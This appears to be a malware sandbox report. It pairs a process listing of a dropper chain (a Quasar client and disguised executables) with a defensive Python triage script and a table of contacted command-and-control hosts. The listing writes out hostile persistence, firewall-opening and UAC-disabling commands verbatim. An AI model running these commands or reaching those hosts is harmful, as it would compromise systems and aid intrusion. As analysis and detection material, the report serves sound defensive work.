C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe
"C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-380592931794380694-599577954-1813269182775463150-1857120456-12712435401267113664"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe
"C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\S0Ahb7wqiLdU.bat" "
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe
"C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\hEb9H3hRUfd2.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1075484357-329037004-210092016729264460814665411141886277669-3823256481606935560"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 888 -s 1164
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\1gDcq6KwkC4i.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Roaming\Network.exe
C:\Users\Admin\AppData\Roaming\Network.exe
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\j6z7JyGJ60PR.bat" "
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\4ZAVHlJm6aW9.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe
"C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe
"C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QZQBLEqosfSN.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1172
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\mgfpRTWIUj34.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 1460
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\a\Servers.exe
"C:\Users\Admin\AppData\Local\Temp\a\Servers.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5483645295594997681410652334-1960867418-73037143113541422541004129646-983109749"
C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe
"C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ppDiKTAIxf8s.bat" "
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\q55bgR7thNVT.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\X5hI9T69oF0z.bat" "
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe
"C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\a\mac.exe
"C:\Users\Admin\AppData\Local\Temp\a\mac.exe"
C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe
"C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
C:\ProgramData\GoogleDat\GoogleUpdate.exe
C:\ProgramData\GoogleDat\GoogleUpdate.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "146272486713716370342146452761-283201182191764725351370645312104548451266761744"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\uTBZJw95QmYA.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 1436
C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe
"C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe"
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1623540158-857654453-1397294642-1169686346-53308944714274225182089971389-345946265"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\W0OTT0ZRdELW.bat" "
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QCGANXGlRZof.bat" "
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\3wSQiyOdnYt3.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
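The process list above is dominated by a handful of repeated techniques: `schtasks /create ... /sc ONLOGON ... /rl HIGHEST` pointing at dropped binaries, `netsh firewall add allowedprogram` for `server.exe`, `reg ADD ... EnableLUA /d 0`, binaries named after system components (`svchost.exe`, `msinfo32.exe`, `comctl32.exe`) dropped outside System32, and the `%TEMP%\<random>.bat` / `chcp 65001` / `ping -n 10 localhost` sequence, which is the restart batch template of the open-source Quasar client. The script below is an added triage example, not code from the sandbox report or from any family it names: it runs offline over command lines excerpted from the listing (plus one constructed, legitimate `svchost.exe` line) and tags each hit with the ATT&CK sub-technique a responder would record. The lookalike-name set, the user-writable path prefixes and the technique labels are the author's choices, not something the report defines.

```python
"""Triage of the process list above: pull out the persistence, defence-evasion and
masquerading command lines and tag them with the ATT&CK sub-technique to record.
Added example; not code from the sandbox report or from any family it names."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "technique detail")

# Command lines excerpted from the process list above, plus one constructed benign
# line (the real svchost.exe) to show that the masquerade check stays quiet on it.
SAMPLE_COMMAND_LINES = [
    r'"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f',
    r'"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f',
    r'"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f',
    r'netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE',
    r'/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',
    r'"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"',
    r'"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"',
    r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\h1jVzK3VHgGC.bat" "',
    r'ping -n 10 localhost',
    r'"C:\Windows\system32\schtasks.exe"',
    r'C:\Windows\system32\svchost.exe -k netsvcs',  # constructed: legitimate location, must not fire
]

# Assumed policy: anything under these prefixes is writable by a standard user.
USER_WRITABLE = re.compile(r'^(?:[A-Za-z]:\\Users\\|[A-Za-z]:\\ProgramData\\|[A-Za-z]:\\Windows\\Temp\\)', re.I)
SYSTEM_DIRS = {r'c:\windows\system32', r'c:\windows\syswow64'}
# Names that only legitimately live in System32/SysWOW64 (comctl32 is a DLL; no such .exe exists).
LOOKALIKE_NAMES = {'svchost.exe', 'msinfo32.exe', 'conhost.exe', 'taskeng.exe', 'comctl32.exe'}

SCHTASKS_RE = re.compile(r'schtasks(?:\.exe)?"?\s+/create\b(?P<args>.*)$', re.I)
TN_RE = re.compile(r'/tn\s+"([^"]+)"', re.I)
TR_RE = re.compile(r'/tr\s+"([^"]+)"', re.I)
NETSH_RE = re.compile(r'netsh(?:\.exe)?\s+firewall\s+add\s+allowedprogram\s+"([^"]+)"', re.I)
ENABLELUA_RE = re.compile(
    r'reg(?:\.exe)?\s+ADD\s+"?HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"?'
    r'.*?/v\s+EnableLUA\b.*?/d\s+0(?:\s|$)', re.I)
TEMP_BAT_RE = re.compile(r'cmd(?:\.exe)?\s+/c\s+""?([^"]*\\Temp\\[^"\\]+\.bat)"', re.I)
PING_DELAY_RE = re.compile(r'\bping(?:\.exe)?\s+-n\s+(\d+)\s+(?:localhost|127\.0\.0\.1)\b', re.I)
EXE_PATH_RE = re.compile(r'^"?([A-Za-z]:\\[^"]+?\.exe)"?(?:\s|$)', re.I)


def masquerade(path):
    """True when a well-known System32 binary name sits anywhere other than System32/SysWOW64."""
    directory, _, name = path.replace('/', '\\').rpartition('\\')
    return name.lower() in LOOKALIKE_NAMES and directory.lower() not in SYSTEM_DIRS


def _opt(rx, text):
    m = rx.search(text)
    return m.group(1) if m else '?'


def triage(command_lines):
    """Return one Finding per suspicious command line, in input order."""
    findings = []
    for cl in command_lines:
        m = SCHTASKS_RE.search(cl)
        if m:
            args = m.group('args')
            name, target = _opt(TN_RE, args), _opt(TR_RE, args)
            flags = []
            if re.search(r'/sc\s+ONLOGON\b', args, re.I):
                flags.append('onlogon')
            if re.search(r'/rl\s+HIGHEST\b', args, re.I):
                flags.append('highest')
            if USER_WRITABLE.match(target) or masquerade(target):
                flags.append('suspicious-target')
            findings.append(Finding('T1053.005 scheduled task', f'{name} -> {target} [{", ".join(flags)}]'))
            continue
        m = NETSH_RE.search(cl)
        if m:
            findings.append(Finding('T1562.004 firewall allow rule', m.group(1)))
            continue
        if ENABLELUA_RE.search(cl):
            findings.append(Finding('T1548.002 UAC disabled (EnableLUA=0)', cl))
            continue
        m = TEMP_BAT_RE.search(cl)
        if m:
            findings.append(Finding('restart/update batch in %TEMP% (Quasar template)', m.group(1)))
            continue
        m = PING_DELAY_RE.search(cl)
        if m:
            findings.append(Finding('T1497.003 delay via ping', f'{m.group(1)} echo requests to localhost'))
            continue
        m = EXE_PATH_RE.match(cl)
        if m and masquerade(m.group(1)):
            findings.append(Finding('T1036.005 masquerading path', m.group(1)))
    return findings


def by_technique(findings):
    """Count findings per technique, the shape a summary line in the report would take."""
    counts = {}
    for f in findings:
        counts[f.technique] = counts.get(f.technique, 0) + 1
    return counts


if __name__ == '__main__':
    for f in triage(SAMPLE_COMMAND_LINES):
        print(f'{f.technique:48} {f.detail}')
```

Two caveats when running this over a full listing. The path rules are only a first pass: the `Windows Shell Interactive` task points at a file inside System32 with no lookalike name, so it is reported with `onlogon, highest` but without `suspicious-target`, and the binary still has to be judged by hash or signature (the report marks the PE as unsigned). The `schtasks` parser also assumes the quoted `/tn` and `/tr` form used throughout this listing; unquoted targets would come back as `?`.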
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| DE | 5.252.155.72:80 | 5.252.155.72 | tcp |
| DE | 185.208.159.240:8080 | 185.208.159.240 | tcp |
| DE | 185.208.159.240:8080 | 185.208.159.240 | tcp |
| US | 8.8.8.8:53 | maerchen-beat-frei.ch | udp |
| US | 45.42.212.91:443 | maerchen-beat-frei.ch | tcp |
| CH | 95.183.50.117:80 | 95.183.50.117 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| TR | 45.138.183.226:80 | 45.138.183.226 | tcp |
| US | 8.8.8.8:53 | plunder.dedyn.io | udp |
| US | 8.8.8.8:53 | OMTkTMNzXANwD.OMTkTMNzXANwD | udp |
| TR | 216.9.224.66:5000 | plunder.dedyn.io | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| HK | 121.127.231.166:80 | 121.127.231.166 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| CN | 124.221.100.215:80 | | tcp |
| CY | 213.133.94.133:4444 | | tcp |
| US | 8.8.8.8:53 | else-directors.gl.at.ply.gg | udp |
| US | 147.185.221.23:56448 | else-directors.gl.at.ply.gg | tcp |
| FI | 95.217.240.67:443 | 95.217.240.67 | tcp |
| DE | 185.208.159.240:56001 | | tcp |
| FI | 95.217.240.67:443 | 95.217.240.67 | tcp |
| FI | 95.217.240.67:443 | 95.217.240.67 | tcp |
| DE | 147.45.44.131:80 | 147.45.44.131 | tcp |
| TR | 45.138.183.226:80 | 45.138.183.226 | tcp |
| TR | 45.138.183.226:80 | 45.138.183.226 | tcp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | bash.mywire.org | udp |
| US | 192.188.88.248:2404 | bash.mywire.org | tcp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | bash1.accesscam.org | udp |
| US | 192.188.88.248:2404 | bash1.accesscam.org | tcp |
| US | 8.8.8.8:53 | tuna91.duckdns.org | udp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| JP | 8.209.212.26:7777 | 8.209.212.26 | tcp |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | bash2.accesscam.org | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | sulfux.ddns.net | udp |
| FI | 95.217.240.67:443 | 95.217.240.67 | tcp |
| FR | 90.113.179.93:9033 | sulfux.ddns.net | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| FI | 95.217.240.67:443 | 95.217.240.67 | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | mail.mindfulinvoice.online | udp |
| US | 199.127.63.127:8041 | mail.mindfulinvoice.online | tcp |
| FI | 95.217.240.67:443 | 95.217.240.67 | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| CN | 120.26.164.174:8088 | | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 147.185.221.23:56448 | else-directors.gl.at.ply.gg | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 172.86.108.55:7771 | | tcp |
| DE | 147.45.44.131:80 | 147.45.44.131 | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 207.231.111.48:80 | 207.231.111.48 | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| RU | 185.215.113.16:80 | | tcp |
| US | 8.8.8.8:53 | adidya354-21806.portmap.host | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | sulfux.ddns.net | udp |
| FR | 90.113.179.93:9033 | sulfux.ddns.net | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| FR | 163.172.125.253:333 | | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| FR | 163.172.125.253:333 | | tcp |
| HK | 45.192.96.63:6001 | 45.192.96.63 | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 147.185.221.23:56448 | else-directors.gl.at.ply.gg | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| DE | 147.45.44.131:80 | 147.45.44.131 | tcp |
| FR | 163.172.125.253:333 | | tcp |
| RU | 185.215.113.16:80 | | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | sulfux.ddns.net | udp |
| FR | 90.113.179.93:9033 | sulfux.ddns.net | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | bash2.accesscam.org | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| RU | 185.215.113.16:80 | | tcp |
| FR | 163.172.125.253:333 | | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| FR | 163.172.125.253:333 | | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | tuna91.duckdns.org | udp |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | docs.google.com | udp |
